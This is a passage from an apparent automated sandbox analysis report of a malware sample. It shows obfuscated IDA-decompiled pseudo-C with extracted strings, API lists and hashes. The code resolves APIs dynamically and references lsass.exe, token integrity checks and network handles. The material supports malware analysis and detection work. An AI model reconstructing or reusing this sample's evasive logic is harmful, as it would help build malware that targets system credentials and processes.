                      					}
                      					_t76 = _t40 - _t40 - 0x1fbf15;
                      					 *0x5090a2 =  *0x5090a2 + _t76;
                      					 *(_t136 - 0x14) = _t76;
                      					_t77 = _t76 - 0x4a2ca2;
                      					_t108 = 0x6278;
                      					 *0x50915a = 0x6278;
                      					_push( *0x5093d4);
                      					 *(_t136 - 8) = _t40;
                      					if(_t40 > 0x15b7) {
                      						L19:
                      						_t108 = _t108 - 0x5e;
                      						goto L20;
                      					} else {
                      						if(_t77 >= 0x36d59a) {
                      							L20:
                      							 *0x50917a = _t108;
                      							 *(_t136 - 8) = GetProcAddress(??, ??);
                      							 *0x509152 =  !_t108;
                      							_t53 =  *(_t136 - 8);
                      							if(0x68be >= 0x68be) {
                      								_t126 =  *0x5091d4; // 0x8851
                      								_t124 = _t126 - 1;
                      								 *0x50bf12 = _t53;
                      							}
                      							 *(_t136 - 8) = _t53;
                      							_t56 =  *(_t136 - 8);
                      							 *0x50983c = _t56;
                      							if(_t56 < 0) {
                      								 *0x509606 =  *0x509606 - 0xac3c62;
                      								 *0x50bf15 = _t56;
                      							}
                      							 *0x50bf07 =  *0x50bf07 - _t56;
                      							 *0x50bf09 =  *0x50bf09 + _t56;
                      							_t89 = "IMCCPHR.exe";
                      							 *(_t136 - 0x18) = _t89;
                      							 *(_t136 - 8) = _t56;
                      							 *(_t136 - 0x10) =  &(_t89[ *(_t136 - 0x10)]);
                      							_t59 =  *(_t136 - 8);
                      							 *0x50912e = 0x68be;
                      							 *(_t136 - 8) = _t59;
                      							 *(_t136 - 0xc) =  !_t59;
                      							_t92 = 0x311fed;
                      							 *(_t136 - 0x18) = 0x311fed;
                      							_push(0);
                      							 *0x50bf0e =  *0x50bf0e - 0x6fd462;
                      							 *0x50914e = 0;
                      							_push("lsass.exe");
                      							L00468BBD("lsass.exe", _t124);
                      							if(0x311fed != 0x32ffac) {
                      								_t92 = 0x412430;
                      							}
                      							L00468197(_t92, _t132, 0xac3c62, 0, _t92);
                      							_push(0x7ec7);
                      							_push(0);
                      							_push(E00480CB7);
                      							goto __ecx;
                      						}
                      						 *(_t136 - 0x18) = _t77;
                      						goto L19;
                      					}
                      				}
                      				_t38 =  *(_t136 - 0x10);
                      				 *0x5090c6 =  *0x5090c6 + 0x29343d;
                      				_t107 =  *0x509112; // 0x7d
                      				if(_t107 == _t107) {
                      					goto L4;
                      				}
                      				 *0x509162 = _t107;
                      				_t107 =  *0x5091ac; // 0xa184
                      				goto L3;
                      			}

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00480B65
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: =4)$CNBP_335.DLL$CoLockObjectExternal$G`}$IMCCPHR.exe$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$X3$lsass.exe
                      • API String ID: 190572456-3141691440
                      • Opcode ID: 1ed13258bbc3e5ebc3b8781ae8fb57ab9b8b45977072918cc2a5e31e55fc9b63
                      • Instruction ID: 8d17de4f1b9cb3e0de6bd03c796a4f9922a3c32b0896c727da71466e6710d8bf
                      • Opcode Fuzzy Hash: 1ed13258bbc3e5ebc3b8781ae8fb57ab9b8b45977072918cc2a5e31e55fc9b63
                      • Instruction Fuzzy Hash: E171AEB5B143469BDB00EFB9E8D96DE7BB0EB39310F04882AD944D7366E3780949DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 63%
                      			E004D598F(int __eax, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				int _t36;
                      				int _t38;
                      				int _t39;
                      				int _t44;
                      				int _t50;
                      				int _t61;
                      				int _t62;
                      				signed int _t77;
                      				signed int _t78;
                      				void* _t79;
                      				intOrPtr _t83;
                      				signed int _t89;
                      				signed short _t119;
                      				short _t120;
                      				intOrPtr _t121;
                      				signed int _t129;
                      				void* _t131;
                      				void* _t132;
                      				void* _t133;
                      				void* _t134;
                      
                      				_t131 = __esi;
                      				_t129 = __edi - 0xef1e;
                      				 *(_t134 - 8) = __eax;
                      				 *0x50913e =  *0x50913e - __ecx;
                      				_t36 =  *(_t134 - 8);
                      				 *0x5097f0 = _t36;
                      				 *(_t134 - 8) = _t36;
                      				 *(_t134 - 8) = _t36;
                      				E004ACA72(0x1221c5, 0x84, __esi, 1, 0x1255c0, 0);
                      				_t38 =  *(_t134 - 8);
                      				 *0x50bf0f =  *0x50bf0f - 0x84;
                      				 *0x50920e =  *0x50920e - 0xa25d;
                      				_t132 = _t131 + 0xade771;
                      				if(_t132 < 0) {
                      					 *0x50bf15 = _t38;
                      					if(_t38 >= 0) {
                      						_t129 = _t129 + 1;
                      					}
                      					 *0x509554 = _t38;
                      				}
                      				 *0x50bf0a =  *0x50bf0a - _t38;
                      				 *(_t134 - 0x28) = _t38;
                      				 *(_t134 - 8) = _t38;
                      				 *0x509cd4 =  *0x509cd4 - 0x316e66;
                      				_t39 =  *(_t134 - 8);
                      				_t119 =  *0x5091b0; // 0x1
                      				if((_t119 & 0x00008dd8) >= 0) {
                      				}
                      				_t120 =  *0x509234; // 0x0
                      				 *(_t134 - 8) = _t39;
                      				if(0xc0 > 0x39) {
                      					L9:
                      					_t132 = _t132 + 0xb8b930;
                      					 *0x50bf15 = 0;
                      					_t129 = _t129 + 0x00000001 & 0x00d50239;
                      					 *0x50978c =  *0x50978c + 0xff2da;
                      					_t77 = 0x3a6067;
                      					 *0x50bf0c =  *0x50bf0c + 0x3a6067;
                      					goto L10;
                      				} else {
                      					_t77 = "CNBP_335.DLL";
                      					if(0x50000a >= 0) {
                      						L10:
                      						_t44 =  *(_t134 - 8);
                      						if( *(_t134 - 0x28) == 0) {
                      							_t78 = _t77 + 0xef;
                      							 *(_t134 - 8) = _t44;
                      							if(_t78 <= 0x2efd) {
                      								L19:
                      								 *0x509180 = 0x6739;
                      								_t121 =  *0x5091b2; // 0x23e0
                      								_t122 = _t121 - 0x9688;
                      								 *0x50921e = _t121 - 0x9688;
                      								_t133 = _t132;
                      								 *0x50bf14 = 0xc1;
                      								_t79 = _t78 - 0xa;
                      								_t50 = InternetCloseHandle( *(_t134 - 0x24));
                      								 *(_t134 - 8) = _t50;
                      								E004BE19A(_t50, _t122, _t129, _t133, _t79 - 0x26d200, 1, _t79 - 0x26d200);
                      								_push(0);
                      								_push(1);
                      								_push(E004D747D);
                      								goto __ebx;
                      							}
                      							_t83 =  *0x509ccc; // 0x0
                      							 *((intOrPtr*)(_t134 - 0xc)) =  *((intOrPtr*)(_t134 - 0xc)) + _t83;
                      							 *0x5091ca = _t120;
                      							 *0x50bf12 =  *0x50bf12 - _t44;
                      							 *0x50bf13 =  *0x50bf13 + _t44;
                      							_t132 = _t132 + _t132;
                      							if(_t132 < 0) {
                      								 *0x50bf15 = _t44;
                      							}
                      							_t78 = _t83 + 0x00000038 >> 0x00007dd5 ^ 0x00475dae;
                      							goto L19;
                      						}
                      						 *(_t134 - 8) = _t44;
                      						L00468D9F(_t77, _t120, _t129, _t132, _t77, _t77);
                      						 *0x5091aa = _t120;
                      						_t61 =  *(_t134 - 8);
                      						_t89 =  !( !("WinFax.dll"));
                      						 *(_t134 - 8) = _t61;
                      						if(_t61 <= 0x2a45b3 && _t89 > 0x3157f5) {
                      							_t89 = 0x3f7c7a;
                      							 *0x50bf0c =  *0x50bf0c - 0x3f7c7a;
                      						}
                      						_t62 =  *(_t134 - 8);
                      						 *((intOrPtr*)(_t134 - 0x3c)) = 4;
                      						 *(_t134 - 8) = _t62;
                      						_push(_t89);
                      						_push(E004D5B7F);
                      						_push(E004AE40E);
                      						return _t62;
                      					}
                      					_t120 = 0xae6d;
                      					 *0x509252 =  *0x509252 - _t132;
                      					goto L9;
                      				}
                      			}
























                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: 5Q$CNBP_335.DLL$G.V$WinFax.dll$api-ms-win-core-string-l1-1-0.dll$fn1$g`:$z|?
                      • API String ID: 0-335918231
                      • Opcode ID: 9e9849a5f38a35fd0368e593e17e189eddad15fc9dc9b9ae8512c0561558d25b
                      • Instruction ID: 1e1be77c086b0c4f02cbaec73922c542dec37d364461c3c5bcae04dc0e8bbd2b
                      • Opcode Fuzzy Hash: 9e9849a5f38a35fd0368e593e17e189eddad15fc9dc9b9ae8512c0561558d25b
                      • Instruction Fuzzy Hash: 3C61FF76A106469FEB01DFB9DCE86CE3BB1EB39300F08846AD90597367E3740948DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetSystemDirectoryW.KERNEL32(?), ref: 004B4207
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: DirectorySystem
                      • String ID: B%<$CNBP_335.DLL$System.Net.Primitives.dll$aaclient.dll$activeds.dll$api-ms-win-core-localization-l1-1-0.dll$mscpxl32.dLL$normaliz.dll
                      • API String ID: 2188284642-340904649
                      • Opcode ID: 046f56a1c164722a65e7e98be1aed20da271b6c44e9072a48e0085f1c3ae910a
                      • Instruction ID: 21789b6ff1abf36875bbe46abc2444efe5c901f9e8a8573e0754ed502fe09bdc
                      • Opcode Fuzzy Hash: 046f56a1c164722a65e7e98be1aed20da271b6c44e9072a48e0085f1c3ae910a
                      • Instruction Fuzzy Hash: 4A518F79E0020A9BCF00EFB8D8D52CDBBB0FB29314F4084AAE945E7756E3740A45DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetLastError.KERNEL32(0000007F), ref: 004E79BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ErrorLast
                      • String ID: &0$.e7$0Lqt:P$CoLockObjectExternal$G`}$PKQ$SetMagnificationDesktopColorEffect$mscpxl32.dLL$ucmhc.dll
                      • API String ID: 1452528299-447824498
                      • Opcode ID: 2b77ac974f53356bbf22024d26a9b411d7e11fe0bc1623984851f5005d0ca099
                      • Instruction ID: 089a12e55f3b11d473d2c91a9b7992e819e103c491e832e360421f7ed61f2cb1
                      • Opcode Fuzzy Hash: 2b77ac974f53356bbf22024d26a9b411d7e11fe0bc1623984851f5005d0ca099
                      • Instruction Fuzzy Hash: 5F518D74F542469FDB00DFB9E8D86CD7FB0EB3A320F1844AA99559B352E3750A48DB04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?), ref: 004A96E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: InformationToken
                      • String ID: MapUserPhysicalPages$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtSetDriverEntryOrder$RegDeleteKeyExW$RtlReleaseRelativeName$V9*$`}
                      • API String ID: 4114910276-847587667
                      • Opcode ID: cf049f001fbfecc03f03871f2a8e2154ab51edc1ca7eb29fb5091be49466b5f8
                      • Instruction ID: f37c0f5678ec6adf7b7eda2f065c65cd1ca6b55983c863394ed10f3c69c967b6
                      • Opcode Fuzzy Hash: cf049f001fbfecc03f03871f2a8e2154ab51edc1ca7eb29fb5091be49466b5f8
                      • Instruction Fuzzy Hash: 8EA1D076E142469BDB00DFB9DC951CD7BB1EF3A320F04816AC849A7726E3390A49DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID: CoLockObjectExternal$MapUserPhysicalPages$NtSetDriverEntryOrder$networkitemfactory.dll$normaliz.dll$ucmhc.dll$x$`}
                      • API String ID: 3472027048-3320159137
                      • Opcode ID: 31ed1d5db19d46630caac47afb4f036ce7dc3cc8c746486a72b1bcc219a2ff00
                      • Instruction ID: e8c6f23c0a449912f037e57a8cdb7e84648bab0fd253c3be11187aa4da524487
                      • Opcode Fuzzy Hash: 31ed1d5db19d46630caac47afb4f036ce7dc3cc8c746486a72b1bcc219a2ff00
                      • Instruction Fuzzy Hash: C451BDB5A152069FDB00DFB4DCE46DD7BB0EB79314F08416AC944A77A6E3380A89EB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • TerminateThread.KERNEL32(?,00000000), ref: 004DCC75
                      • Sleep.KERNEL32(000003E8), ref: 004DCFA5
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: SleepTerminateThread
                      • String ID: CNBP_335.DLL$G.V$WSManHTTPConfig.exe$ucmhc.dll$`}
                      • API String ID: 480259992-2780909559
                      • Opcode ID: 246d1772fc066ace8d7c1e5dcbbcb5dd0bc2aae0014cf6080e8473ba49b9ba49
                      • Instruction ID: e2dbd6b54c3cfd99d0f622891ce59f0236c9e01660c82b7a13874f3eb7a9756a
                      • Opcode Fuzzy Hash: 246d1772fc066ace8d7c1e5dcbbcb5dd0bc2aae0014cf6080e8473ba49b9ba49
                      • Instruction Fuzzy Hash: 2C71BC75A542428FDB01DF74ECE86CD3BB1EB79314F08816B8948973A6E2780A48EB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00499BE8
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: &"7$G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$activeds.dll$networkitemfactory.dll$`}
                      • API String ID: 190572456-830328022
                      • Opcode ID: 1e62c7c84ccacd2e4ad41877efe2f6be189d08a479da8bef1fff470c8dff03be
                      • Instruction ID: bafc66baed9943f42ed8994ffddb644aafd16b49c3e2c2ad774c690539ea3986
                      • Opcode Fuzzy Hash: 1e62c7c84ccacd2e4ad41877efe2f6be189d08a479da8bef1fff470c8dff03be
                      • Instruction Fuzzy Hash: 19516975A043469FDB00DFB8EC982CE7FB1EB79310F08446AC4449736AE3390A48EB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetFileSize.KERNEL32(?,00000000), ref: 004F9234
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FileSize
                      • String ID: OSProvider.dll$System.Net.Primitives.dll$WinFax.dll$ah"$api-ms-win-core-namedpipe-l1-1-0.dll$sxproxy.dll
                      • API String ID: 3433856609-1704396371
                      • Opcode ID: fc41783bd8d6a6a2387f4c48dc523c112113f2af6adccb6682839a20e62a3a67
                      • Instruction ID: c9c98ba2c7c406c755d3a4b28666c09a7c742493c3ed8a7f67620173e64becb5
                      • Opcode Fuzzy Hash: fc41783bd8d6a6a2387f4c48dc523c112113f2af6adccb6682839a20e62a3a67
                      • Instruction Fuzzy Hash: 1251E076A543469FDB00DFB9EC986CD3BB1EB79310B08442AD844D3366E3340A49EB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 42%
                      			E0048EFC5(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                      				unsigned short _t33;
                      				unsigned short _t35;
                      				_Unknown_base(*)()* _t39;
                      				unsigned short _t41;
                      				unsigned short _t43;
                      				signed int _t44;
                      				unsigned short _t53;
                      				void* _t63;
                      				void* _t85;
                      				short _t87;
                      				void* _t89;
                      				signed int _t91;
                      				void* _t94;
                      				intOrPtr _t96;
                      				void* _t97;
                      
                      				_t89 = __edx;
                      				_t33 =  *(_t97 - 8);
                      				 *(_t97 - 0x10) =  !( *(_t97 - 0x20));
                      				 *(_t97 - 8) = _t33;
                      				 *(_t97 - 0xc) = _t33;
                      				_t35 =  *(_t97 - 8);
                      				_push( *0x50944c);
                      				 *(_t97 - 8) = _t35;
                      				_push(_t35 >> 0x5ded);
                      				L00468BBD(_t35 >> 0x5ded, __edx);
                      				if("WSManHTTPConfig.exe" == 0x3aaf) {
                      				}
                      				 *0x50918a = 0x69fd;
                      				_t85 = 0x69fd + _t89;
                      				_t91 = _t89 + _t89 + 0x897d17;
                      				_t39 = GetProcAddress(??, ??);
                      				 *0x50bf11 =  *0x50bf11 - _t91;
                      				_t96 =  *0x50922c; // 0xd0b1
                      				 *0x50bf13 = _t39;
                      				_t63 = 0 - _t39;
                      				_t94 = 0xe14d;
                      				 *(_t97 - 8) = _t39;
                      				_t41 =  *(_t97 - 8);
                      				if(_t41 < 0x251f) {
                      					_t63 = 0x44a63f;
                      					 *0x509110 =  *0x509110 - 0x44a63f;
                      					_t85 = _t85 + _t85;
                      					if(_t85 != _t85) {
                      						 *0x5091aa = _t91;
                      					}
                      				}
                      				 *(_t97 - 8) = _t41;
                      				L0046744A(_t63, _t85, _t91, _t94, _t96, _t41, _t41);
                      				_t43 =  *(_t97 - 8);
                      				 *0x50bf0b =  *0x50bf0b + _t63 - 0x262a + 1;
                      				 *0x509c60 = _t43;
                      				 *0x50bf13 =  *0x50bf13 + _t43;
                      				 *(_t97 - 8) = _t43;
                      				if(_t43 != 0x18) {
                      					L12:
                      					_t44 = _t43 + 0xe9;
                      					goto L13;
                      				} else {
                      					_t44 =  *(_t97 - 0x10);
                      					if("WSManHTTPConfig.exe" != "WSManHTTPConfig.exe") {
                      						L13:
                      						 *0x50bf07 =  *0x50bf07 + _t44;
                      						 *0x50bf0a =  *0x50bf0a + 0x250a70;
                      						_push(0);
                      						_t87 = _t85 + _t85 + 1;
                      						 *0x509186 = _t87;
                      						 *0x50bf0a =  *0x50bf0a;
                      						if(0 >= 0x3b28) {
                      							 *((intOrPtr*)(_t97 - 0x24)) =  *((intOrPtr*)(_t97 - 0x24)) + _t87;
                      						}
                      						_push( *0x50912a);
                      						 *0x50907a =  *0x50907a + 0x1b9547;
                      						_t53 =  *(_t97 - 8);
                      						 *(_t97 - 8) = _t53;
                      						 *0x50904c =  *0x50904c - _t53;
                      						_push(0);
                      						_push( !0x4602d5);
                      						_push(E0048F1BA);
                      						_push(L00468197);
                      						return _t53 + _t53 + _t53 + _t53;
                      					}
                      					if(_t85 == _t85) {
                      						 *0x50bf0f =  *0x50bf0f + _t85;
                      						_t85 = _t85 + _t85;
                      					}
                      					if((_t91 & 0x0078f5ac) <= 0) {
                      						 *0x50a940 =  *0x50a940 + _t91;
                      						 *0x509202 = _t91;
                      					}
                      					_t43 =  *0x50bf13; // -9
                      					 *0x50bf14 = _t43;
                      					_t94 = 0;
                      					goto L12;
                      				}
                      			}



















                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0048F03A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$HMETAFILEPICT_UserSize$NtPowerInformation$WSManHTTPConfig.exe$mscpxl32.dLL$p%
                      • API String ID: 190572456-4157850270
                      • Opcode ID: a0496b54c37e6094a7668117d8dba9d22dcb9ffaadc84a811336263c2251dc23
                      • Instruction ID: 4df4106768a3797d80051e91c1f8503140d658d6f946ed0a8ec638ae631480bb
                      • Opcode Fuzzy Hash: a0496b54c37e6094a7668117d8dba9d22dcb9ffaadc84a811336263c2251dc23
                      • Instruction Fuzzy Hash: BD518CB9B043469BDB00EFB8DCD86CD7BB0EB29320F44447AD940E3756E2380949DB09
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 50%
                      			E004A8F07(void* __ebx, void* __ecx, signed short __edx, void* __edi, short __esi, void* __eflags) {
                      				void* _t26;
                      				void* _t28;
                      				void* _t33;
                      				void* _t34;
                      				void* _t35;
                      				void* _t37;
                      				char _t38;
                      				intOrPtr _t68;
                      				intOrPtr _t83;
                      				short _t84;
                      				signed short _t92;
                      				short _t93;
                      				short _t100;
                      				void* _t104;
                      
                      				_t100 = __esi;
                      				_t92 = __edx;
                      				E004A6C05(_t26, __edx, __edi, 1, 1);
                      				if((_t92 & 0x00009f77) < 0) {
                      					_t38 =  *0x50bf13; // -9
                      					 *0x50bf14 = _t38;
                      					 *0x50bf07 = _t38 + _t38 + 0x1e4;
                      				}
                      				_t93 = 0x88dc;
                      				 *0x50a860 =  *0x50a860 - 0x88dc;
                      				_t28 = GetCurrentProcess();
                      				if(0x888c != 0) {
                      					 *0x509228 = _t100;
                      				}
                      				 *(_t104 - 8) = _t28;
                      				 *0x50915e = 0x5ba4;
                      				_push( *((intOrPtr*)(_t104 - 0xc)));
                      				E004A7263( *(_t104 - 8), _t93);
                      				_t33 =  *(_t104 - 8);
                      				 *(_t104 - 8) = _t33;
                      				if(_t33 != 0x2f78) {
                      				}
                      				_t34 =  *(_t104 - 8);
                      				_t83 =  *0x509168; // 0x118d
                      				 *0x5091cc = _t93;
                      				 *(_t104 - 0x20) = _t34;
                      				 *(_t104 - 8) = _t34;
                      				_t35 =  *(_t104 - 8);
                      				_t84 = _t83 + 0x57d046;
                      				if(_t84 < _t84) {
                      					_t93 = 0x991a;
                      					 *0x509226 = _t100;
                      					 *0x50bf12 = _t35;
                      					 *0x50934c =  *0x50934c + _t100 - 0xc086 + 1;
                      					if(_t35 >= 0) {
                      						 *0x509518 =  *0x509518 + _t35;
                      					}
                      					_t68 =  *0x509904; // 0x0
                      					 *0x50bf0a =  *0x50bf0a - _t68;
                      					 *0x50bf0b =  *0x50bf0b + _t68;
                      					 *0x50915c = _t84;
                      				}
                      				 *(_t104 - 8) = _t104 - 0x24;
                      				 *0x509c9c =  *0x509c9c + 0x303256;
                      				 *0x509dc8 = 0x303256;
                      				_t37 =  *(_t104 - 8);
                      				if((_t93 + 0x00000001 & 0x0000945a) >= 0) {
                      					 *0x50bf17 =  *0x50bf17 - _t37;
                      					 *0x50bf17 =  *0x50bf17 + _t37;
                      					if(0 <= 0x6b4a7) {
                      					}
                      				}
                      				 *0x509132 =  *0x509132 + 0x1763bef;
                      				 *(_t104 - 0x3c) = _t37;
                      				 *(_t104 - 8) = _t37;
                      				_push(0x6262 >> 0x6262);
                      				_push(0x6262 >> 0x6262);
                      				_push(0x6262 >> 0x6262);
                      				_push(E004A90E8);
                      				_push(E00469BBC);
                      				return _t37;
                      			}


















                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 004A8F3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CurrentProcess
                      • String ID: G.V$MapUserPhysicalPages$NtPowerInformation$System.Xml.XmlDocument.dll$V20$ucmhc.dll
                      • API String ID: 2050909247-3469501440
                      • Opcode ID: c0899a1504df3af32f325632db91db891ba291e2ada058e94a7a962e3b465fac
                      • Instruction ID: 7450580381a0ece5fd96fdb6882a5efdc4e73b25ec897176917bcee87dc13f87
                      • Opcode Fuzzy Hash: c0899a1504df3af32f325632db91db891ba291e2ada058e94a7a962e3b465fac
                      • Instruction Fuzzy Hash: 3A41DD75B543469FDB00EFB9ECD42CD7BB0FB3A310B08446A9889D7326E2340A089B59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0047B55F
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: $G>$>;$NtSetDriverEntryOrder$WFServicesReg.exe$WinFax.dll$activeds.dll
                      • API String ID: 190572456-2225798828
                      • Opcode ID: 4166fe98a3c85b4b0765844330d5b07e048e74812b4c07c0eea400dfc2818e2f
                      • Instruction ID: 7a45e3ef05fc088028042079ebf1cc44a6574be9e19278e8a1d78446082cce0c
                      • Opcode Fuzzy Hash: 4166fe98a3c85b4b0765844330d5b07e048e74812b4c07c0eea400dfc2818e2f
                      • Instruction Fuzzy Hash: 7A4181B4E1020A9FCB00DFB9D8D46DE7BB1EB29314F54803ADA4AE7316D3344984DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CommandLine
                      • String ID: IMCCPHR.exe$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$activeds.dll$api-ms-win-core-namedpipe-l1-1-0.dll$normaliz.dll$ucmhc.dll
                      • API String ID: 3253501508-771882437
                      • Opcode ID: 2eef136b8b55b95513f795949d84964e952052df19c832bb56a9d5a320ee3bc7
                      • Instruction ID: b7aeb221ccd88d159a0966d8203df523f85ceee8f324c3f8d295a77784a55c2f
                      • Opcode Fuzzy Hash: 2eef136b8b55b95513f795949d84964e952052df19c832bb56a9d5a320ee3bc7
                      • Instruction Fuzzy Hash: 5C415EB9F5030AAFCB01DFB9D8D47CD7BB1FB38310F1444699980AB785E2750A498B40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E004BFA6A(void* __ebx, short __ecx, void* __edi, void* __esi, void* __eflags) {
                      				_Unknown_base(*)()* _t22;
                      				_Unknown_base(*)()* _t26;
                      				_Unknown_base(*)()* _t27;
                      				_Unknown_base(*)()* _t28;
                      				_Unknown_base(*)()* _t30;
                      				void* _t31;
                      				_Unknown_base(*)()* _t34;
                      				_Unknown_base(*)()* _t35;
                      				_Unknown_base(*)()* _t38;
                      				intOrPtr _t45;
                      				_Unknown_base(*)()* _t52;
                      				intOrPtr _t57;
                      				short _t72;
                      				intOrPtr _t75;
                      				intOrPtr _t77;
                      				void* _t93;
                      				void* _t97;
                      				intOrPtr _t99;
                      				void* _t103;
                      				void* _t105;
                      
                      				_t72 = __ecx;
                      				E004A743B(__ebx, __ecx, __esi);
                      				_pop(_t22);
                      				 *(_t105 - 8) = _t22;
                      				_t45 =  *0x509870; // 0x21b400
                      				 *0x50bf10 =  *0x50bf10 + 0x1287d;
                      				E004B5012(_t45, __edi, __esi);
                      				_t26 =  *(_t105 - 8);
                      				_t97 = _t26;
                      				 *0x50926e =  *0x50926e - _t97;
                      				 *0x50bf17 =  *0x50bf17 + _t26;
                      				 *0x50906e =  *0x50906e + _t26;
                      				_t93 = (__edi + _t97 + 0x0000d743 | 0x000000eb) + 1;
                      				 *0x50bf14 = _t26;
                      				_t52 =  *0x50bf14; // 0x0
                      				 *(_t105 - 8) = _t26;
                      				 *0x5091e0 =  *0x5091e0;
